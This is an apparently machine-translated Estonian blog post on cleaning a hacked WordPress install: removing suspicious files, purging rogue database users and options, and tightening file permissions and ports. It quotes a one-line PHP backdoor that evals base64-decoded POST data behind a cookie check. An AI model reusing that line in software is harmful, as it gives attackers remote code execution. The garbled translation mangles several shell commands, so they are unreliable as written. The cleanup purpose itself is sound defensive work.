WordPress Exploit – puhastage viirusfailid, SQL ja serveri turvalisus.

Enne loe see postitus, siis peaks näha lisada siin, Mõista midagi. :)

Leidsin selle mitmest ajaveebifailist aadressil stealthsettings.com, allpool toodutega sarnased koodid, mis ilmnesid viirusnakkuse tagajärjel feat of WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

Eespool puhul on faili xmlrpc.php pärit unineAga kell grep server, näeb päris palju koodid sedalaadi allikatest.

Puhastus nakatunud failid:

Ooookkkk ...
1. Parim lahendus, pärast seda teha backupCPC ja puhastada andmebaasis on eemaldama faile WordPress (pärast hoolikat kontrollimist saate hoida faili wp-config.php ja faile, mis pole rangelt seotud wp-platvormiga) serverisse ja laadida algsed versioonist 2.5.1 (Seekord teha upgrade versiooni wp :)) http://wordpress.org/download/ . Kustuta failid sealhulgas teema, kui teil on usku, et võite vaadata neid hoolikalt.

On ilmne, et failid on mõjutanud ja teemad, mida ei ole kasutatud enne blogis ja lihtsalt muutuvad teema, ei saa seda probleemi lahendada.

./andreea/wp-content/themes/default/index.php:

2. Otsi ja kustutada kõik failid, mis sisaldavad: * _new.php, _old.php * * .jpgg, .giff * * .pngg ja faili wp-info.txt, kui üldse.

leidma. -nimi “* _new.php”
leidma. -nimi “* _old.php”
leidma. -nimi "* .jpgg"
leidma. -nimi “* _giff”
leidma. -nimi “* _pngg”
leidma. -nimi "wp-info.txt"

3. sisse / tmp Otsingu- ja kustutada nagu tmpYwbzT2

puhastamise SQL :

1. tabelis tabelis wp_options näha, kas kustutada read: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Kõik failis wp_options, minema active_plugins ja kustutada, kui on olemas plugin, mis lõpeb üks laiendiga * _new.php * _old.php, *. jpgg, *. GIFF, *. pngg või kui teine ​​laiendus kahtlusel hoolikalt kontrollima.

3. Tabelis wp_usersVaata, kui on kasutaja, kes ei ole kirjutatud midagi tema õigus, veerg user_nicename. Kustutage see kasutaja, kuid pidage meeles ID veerus olevat numbrit. See kasutaja kasutab tõenäoliselt "WordPress"Ca USER_LOGIN on loodud ja ilmub 00: 00: 00 0000-00-00.

4. Mine tabel wp_usermeta ja kustutada kõik read kuuluvad ID eespool.

Kui olete selle sql-i puhastuse teinud, keelake ja aktiveerige kõik pistikprogrammid. (ajaveebis -> Armatuurlaud -> pistikprogrammid)

Secure server:

1. Vaata, mida kataloogid ja failid "kirjutatav"(chmod 777) ja proovige panna a chmod mis ei luba enam ühelgi tasemel nende kirjutamist. (chmod 644 näiteks)

Otsi. -Perm-2-LS

2. Vaata, millised failid on bitt suid või SGID . Kui sa ei kasuta neid faile panna neid chmod 0 või eemaldada pakett, mida see sisaldab. Nad on väga ohtlikud, sest nad täitma privileege "rühm"Või"juur"Mitte tavaline kasutaja privileegid täita selle faili.

leida /-type f-perm-04000-LS
leida /-type f-perm-02000-LS

3. Vaata, mida sadamad on avatud ja proovite sulgeda või kinnitada need, mida ei kasutata.

netstat-| grep-i kuulata

Nii palju. Näen Mõned blogid on keelatud de Google Search ja teised ütlevad "Ta tegi need hästi!!!" . No ma oleksin seda nende eest teinud... aga mis sa ütled, kui Google hakkab keelama kõik alad vormimine  On rämpspost ja pane troojalaste (Trojan.Clicker.HTML) küpsistes?